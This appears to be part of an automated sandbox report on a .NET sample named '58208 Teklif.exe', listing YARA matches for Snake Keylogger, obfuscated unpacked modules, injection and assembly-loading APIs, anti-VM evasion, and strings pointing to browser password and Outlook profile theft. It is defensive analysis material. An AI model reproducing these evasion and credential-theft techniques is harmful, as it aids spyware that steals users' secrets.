            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 58208 Teklif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, SfKvfedl6YqdMaJJcO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.58208 Teklif.exe.32328f4.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.31e6318.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.5ad0000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.31ee330.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
            Source: C:\Users\user\Desktop\58208 Teklif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\58208 Teklif.exe.logJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMutant created: NULL
            Source: 58208 Teklif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 58208 Teklif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\58208 Teklif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.000000000314C000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000315B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3771367022.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000313D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003182000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000318F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 58208 Teklif.exeReversingLabs: Detection: 52%
            Source: 58208 Teklif.exeVirustotal: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 58208 Teklif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 58208 Teklif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 58208 Teklif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: uVJY.pdb source: 58208 Teklif.exe
            Source: Binary string: uVJY.pdbSHA256N source: 58208 Teklif.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 58208 Teklif.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.58208 Teklif.exe.5910000.9.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.58208 Teklif.exe.5910000.9.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.58208 Teklif.exe.31d4e7c.1.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.58208 Teklif.exe.31d4e7c.1.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.cs.Net Code: qlBVMDuy4O System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_0155F0E8 push esp; iretd 0_2_0155F0E9
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_01555DCA pushad ; iretd 0_2_01555DD9
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07792533 pushad ; retf 0_2_07792534
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_01419770 push esp; ret 3_2_01419771
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9CE01 push ds; retn 0006h3_2_05A9CE02
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD3675 push es; iretd 3_2_06BD367C
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDF759 push es; ret 3_2_06BDF888
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD2471 pushad ; retn 0006h3_2_06BD2472
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD9045 push es; ret 3_2_06BD904C
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD29AE push FFFFFF8Bh; ret 3_2_06BD29B0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFC561 pushad ; ret 3_2_06BFC562
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF62FB push ss; ret 3_2_06BF6302
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFACBB push ebp; ret 3_2_06BFAF12
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAAA9 push ecx; ret 3_2_06BFAAAA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAADB push ecx; ret 3_2_06BFAAE2
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAAD9 push ecx; ret 3_2_06BFAADA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAB98 push ebx; ret 3_2_06BFAB9A
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFA918 push eax; ret 3_2_06BFA91A
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFA97F push ecx; ret 3_2_06BFA992
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF7081 push ds; ret 3_2_06BF7082
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF70C8 push ds; ret 3_2_06BF70CA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF7133 push ds; ret 3_2_06BF713A
            Source: 58208 Teklif.exeStatic PE information: section name: .text entropy: 7.939659429835133
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ov3UajLBVQs6ILc8yA.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'i0JnWyw5xe', 'MOxnJGogIN', 'xZFnz14FVB', 'oZQP4VsIre', 'SMaPbKk73w', 'bMlPnyjxBX', 'lxoPPcdbic', 'c6CLgUPAx8m36WCR7w8'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, YG1e6VBcKiUT8HVni8.csHigh entropy of concatenated method names: 'j6iMnrrXo', 'p8ds4yImq', 'md4Tavpur', 'G20iSVZgT', 'aahFPi9UW', 'CiECtA727', 'tUybNKNfTqdYoZ0tr2', 'MajRD6hbDtFIGdx9f0', 'nmkR6t3Zo', 'Vt3Ko8yQC'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.csHigh entropy of concatenated method names: 'oZfPIEUDZm', 'AbEPpw7T7s', 'YquP6A5eoQ', 'FxdPdpMnpU', 'zR4Pw3nAjS', 'ly9PkUs6tT', 'fOUP1VFniU', 'IXdPgIxxc1', 'tLLPlLldYK', 'zESPQW0bKW'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, y8PW6obPExJQorPGBu.csHigh entropy of concatenated method names: 'PUv1peWQM3', 'ub41douQnv', 'Ida1kaGgVt', 'SIokJxddqo', 'TE8kzuUthS', 'LAV149d5sa', 'zVR1bWanxW', 'YAa1nQJA0V', 'sMJ1PSH4B3', 'pTe1V24RKv'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, FA8yIwaG2xHBjFO0PN.csHigh entropy of concatenated method names: 'Fc4RptwFhS', 'EVeR6UM9dl', 'lubRdrtiZe', 'wbCRwOgFgv', 'PRgRkHXP7O', 'L6hR1IQEB6', 'eB3Rgpd9P4', 'qhPRlHixdi', 'S4VRQK0INL', 'VgpRt0DtLp'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, SfKvfedl6YqdMaJJcO.csHigh entropy of concatenated method names: 'nnk6ogfMHI', 'WZI6SYuk2O', 'Aay6LotdmM', 'Lwo6qKRoVU', 'fRI6rQrFyJ', 'ASX6YJvp0C', 'GQa6NDXtmw', 'JqQ691veVc', 'AbF6WkBRpW', 'jr06JsKhRu'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, Mbac2TE9ygslISwFbl.csHigh entropy of concatenated method names: 'zTgRx5wWxo', 'xoiRuWHeOO', 'PC8Rm8EAhJ', 'B6DRabpI8L', 'niDRolSpvh', 'a35RAGoSbP', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, Nkn6l0K9M4ISy88b1R.csHigh entropy of concatenated method names: 're0dsqsuDH', 'XDIdTY5Jj5', 'hY8dekdd4V', 'QnBdFxerfv', 'agMd5cRdaU', 'nrxdhHsXBB', 'yI4dfZn2nB', 'JCDdRNs8mu', 'cvCdjBIYxS', 'pI0dKCocR3'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, mXyo9lc8mMDVspYqnf.csHigh entropy of concatenated method names: 'IGIf90u4nf', 'ExBfJeX3uM', 'DNyR4dJT2X', 'mgURbnNDK3', 'CCRfHahUry', 'jcjf7DgH0d', 'bHBfDsixjo', 'TDYfov7js9', 'LxMfSha9HS', 'YxIfL0IDco'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, B7MMIpTyXcBbeAMFnb.csHigh entropy of concatenated method names: 'Dispose', 'FQ4bWhVLQf', 'o8nnu9SeZV', 'RC388QtlOR', 'YPxbJoOXfX', 'WOmbzPxvcR', 'ProcessDialogKey', 'WSOn48lJPN', 'mNNnb0uFtA', 'YS2nnCABuy'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, oWVvW42EmpKy9BSgWw.csHigh entropy of concatenated method names: 'NdLce7BXFC', 'e0ccFG8oVR', 'gFicx0QBGB', 'a51cuM9OqG', 'MOCcajCCFG', 'ppscACJM34', 'JqIc26OlCA', 'K53cBAuR6K', 'wCVcO9SIUg', 'XLfcH1AifM'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, HvXS97UUa7qseCLu3gf.csHigh entropy of concatenated method names: 'ToString', 'EviKPn2vUo', 'NCmKVogdD4', 'aaOKIVTQ7p', 'yOsKpDSybS', 'aNsK6rbikR', 'SqqKdFojKR', 'ekOKwmwUGa', 'uXZ9jgAmpRMMPRXwgKT', 'DJtlJLAUmkqHGEHRhG7'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, f3RHjcWfG0nFOPiZ5P.csHigh entropy of concatenated method names: 'COKkIT7oB8', 'Somk6cWpNR', 'N97kwiIM3D', 'JmVk1JeW9a', 'WXdkg9ycc0', 'ge9wrGwvOM', 'aLSwYOuNWe', 'DEDwN7rkdg', 'Euww9vBYiR', 'JB8wWf9G31'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ymY9i55puh8sJQy4lC.csHigh entropy of concatenated method names: 'ugJfQ0bPMi', 'EUjftHC6ip', 'ToString', 'IHJfpr47EV', 'iuMf67hnUK', 'TjufdN0xe3', 'uF9fw4EONe', 'vwxfkdoTyn', 'vXuf152u6Q', 'ngMfg8J3RA'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, HKBtH9zLyWSY3PprRP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bSdjcJXCiF', 'AO9j5EJ63N', 'IkojhWT6CJ', 'wq5jfnXkoA', 'Q8KjRe9Mdm', 'AQ7jjQhF9i', 'fDFjKN8UpI'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ocgNYIURVbTtgbjxB1R.csHigh entropy of concatenated method names: 'IgOjUNYiVq', 'yiVjvWC42y', 'DNRjMwUZOR', 'srCjsyafAM', 'Ct8jZkArYX', 'rbHjTmPcUq', 'VgJjiPtaIT', 'XbBjePbQib', 'PahjFcdvR0', 'xdIjCOQ9pm'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, wVhD8CnnV4UcccbIW4.csHigh entropy of concatenated method names: 'aIg1USDgx9', 'jV91vi8o23', 'Qkm1MIg4hd', 'rXJ1sWCCTs', 'M8R1ZypAkO', 'DOC1TM8m8d', 'uZj1ihrlQY', 'Bk91elqMVa', 'AZG1FSQU8L', 'x2c1CC7Ogo'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, aKoppcmWP2f8yAjY4l.csHigh entropy of concatenated method names: 'fvfb1l7DpV', 'M8ibg0htUB', 'rVkbQxCgMi', 'MuybtMDkhM', 'ibbb5bMPHc', 'JrJbhVuZyN', 'WW1EHm7UrPxacBnLNj', 'u9OcAsoqmsDcU6Wgyu', 'TKAbbgfhvH', 'GupbPnXaUB'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, WXPo1s6SZUfJWf3Ztw.csHigh entropy of concatenated method names: 'fEswZqw6gn', 'KH4wi0cn65', 'fXJdmY30BN', 't3Bda0ERhb', 'RuodAb6oNk', 'deAd3Na0RH', 'iAed2Kwm3c', 'QRddBFGGbQ', 'qVcdE6IV2T', 'UTVdOCRbN1'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, MK85Z0STNaOnKwpaOT.csHigh entropy of concatenated method names: 'Enu5OCG8LK', 'GbQ57jpTW1', 'ujZ5oXg8dR', 'fer5S5WeBm', 'G5r5ua7vgk', 'UXZ5mplZnW', 'RXN5aOlFWK', 'OHt5AQFC9N', 'yjI53V0jKY', 'Oiu52CAMKh'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, JgWfdKAVBhtTy2KMZT.csHigh entropy of concatenated method names: 'hN4jby8yLc', 'RhfjPQutD5', 'YgBjVCXnxK', 'I9Zjpvm4DR', 'lY5j6C4Jgp', 'ylMjwkVS9A', 'hNTjkaeNYd', 'zFvRNU0TDr', 'K6bR9CpeoW', 'wUmRW6x0ud'
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 9050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: A050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 922337203685477Jump to behavior
